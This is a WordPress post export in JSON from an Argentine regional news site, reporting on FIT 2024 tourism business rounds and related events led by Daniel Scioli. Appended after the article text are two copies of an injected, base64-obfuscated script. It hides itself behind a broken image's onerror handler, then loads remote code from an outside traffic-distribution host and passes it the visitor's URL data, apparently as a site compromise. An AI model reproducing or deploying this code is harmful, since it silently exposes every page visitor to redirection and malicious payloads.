{"id":4453,"date":"2024-10-01T11:23:02","date_gmt":"2024-10-01T14:23:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4453"},"modified":"2025-08-13T23:48:01","modified_gmt":"2025-08-14T02:48:01","slug":"fit-2024-mas-de-500-inscriptos-para-las-rondas-de-negocios","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4453","title":{"rendered":"FIT 2024: m\u00e1s de 500 inscriptos para las rondas de negocios"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8a120dc97c14135af63ebb9137ee581a\" style=\"background-color:#0772b0\"><em>Scioli encabez\u00f3 la apertura de ese \u00e1mbito en el que est\u00e1n previstas m\u00e1s de 4.000 reuniones entre los diversos sectores del turismo.<\/em><\/h4>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0<strong>Daniel Scioli<\/strong>, encabez\u00f3 hoy la apertura de la\u00a0<strong>primera jornada de rondas de negocios<\/strong>\u00a0que tienen lugar en la FIT 2024, para las que se inscribieron m\u00e1s de\u00a0<strong>500 empresas<\/strong>, operadores de\u00a0<strong>12 pa\u00edses<\/strong>\u00a0y cuya agenda incluye m\u00e1s de\u00a0<strong>4.000 reuniones<\/strong>.<\/p>\n\n\n\n<p><em>\u201cCelebro esta convocatoria que permite al sector privado de la Argentina y del mundo ponerse en contacto para generar negocios, impulsar el ingreso de divisas y seguir generando puestos de trabajo en todo el territorio nacional. Desde el Inprotur, venimos trabajando fuertemente para consolidarnos como un destino l\u00edder en la regi\u00f3n y lo estamos logrando\u201d<\/em>, subray\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/20240930_scioli_parques.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La agenda de la jornada continu\u00f3 con la participaci\u00f3n de Scioli en la celebraci\u00f3n del&nbsp;<strong>90\u00ba aniversario de la sanci\u00f3n de la ley que dio origen a la Administraci\u00f3n de Parques Nacionales<\/strong>. El Secretario destac\u00f3 la tarea de las actuales autoridades del organismo, a las que elogi\u00f3 por&nbsp;<em>\u201cquebrar el statu quo para posibilitar el desarrollo del turismo de la naturaleza en la Argentina, mejorando la oferta y los servicios en un rubro cada vez m\u00e1s demandado y para el que contamos con un patrimonio extraordinario\u201d<\/em>.<\/p>\n\n\n\n<p>Scioli particip\u00f3 luego de una presentaci\u00f3n de la&nbsp;<strong>Federaci\u00f3n Sudamericana de Turismo<\/strong>&nbsp;(Fedesud) en la que -ante representantes de&nbsp;<strong>Bolivia, Brasil, Chile, Ecuador, Paraguay, Per\u00fa y Venezuela<\/strong>&#8211; destac\u00f3 la pol\u00edtica de cielos abiertos&nbsp;<em>\u201csin precedentes\u201d<\/em>&nbsp;que est\u00e1 llevando a cabo la Argentina,&nbsp;<em>\u201csumando competitividad y mejora la oferta tur\u00edstica\u201d<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/jet05946.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Asimismo, se present\u00f3 el\u00a0<strong>Foro Nacional de Turismo<\/strong>, con la presencia de\u00a0<strong>Scioli<\/strong>; de la subsecretaria de Turismo de la Naci\u00f3n,\u00a0<strong>Yanina Mart\u00ednez<\/strong>; del presidente de la Agencia C\u00f3rdoba Turismo,\u00a0<strong>Dar\u00edo Capitani<\/strong>; y del presidente del Consejo Federal de Turismo,\u00a0<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>. El Foro se realizar\u00e1 en la provincia de C\u00f3rdoba el 21 de noviembre, bajo el lema\u00a0<strong>\u201cDestinIA, Rumbo al Futuro\u201d<\/strong>. Su realizaci\u00f3n se encuentra establecida en el\u00a0<strong>Estatuto del Consejo Federal de Turismo<\/strong>\u00a0y en esta edici\u00f3n se esperan m\u00e1s de mil participantes. Se desarrollar\u00e1 con el objetivo de mostrar la importancia de la IA en el Turismo de cara al futuro, brindando herramientas que permitan crear\u00a0<strong>experiencias personalizadas para el visitante<\/strong>, motivando la prolongaci\u00f3n de su estad\u00eda.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Scioli encabez\u00f3 la apertura de ese \u00e1mbito en el que est\u00e1n previstas m\u00e1s de 4.000 reuniones entre los diversos sectores del turismo. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0Daniel Scioli, encabez\u00f3 hoy la apertura de la\u00a0primera jornada de rondas de negocios\u00a0que tienen lugar en la FIT 2024, para las que se inscribieron [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4454,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,21],"tags":[],"class_list":{"0":"post-4453","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4453"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4453"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4453\/revisions"}],"predecessor-version":[{"id":6673,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4453\/revisions\/6673"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4454"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4453"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4453"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4453"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}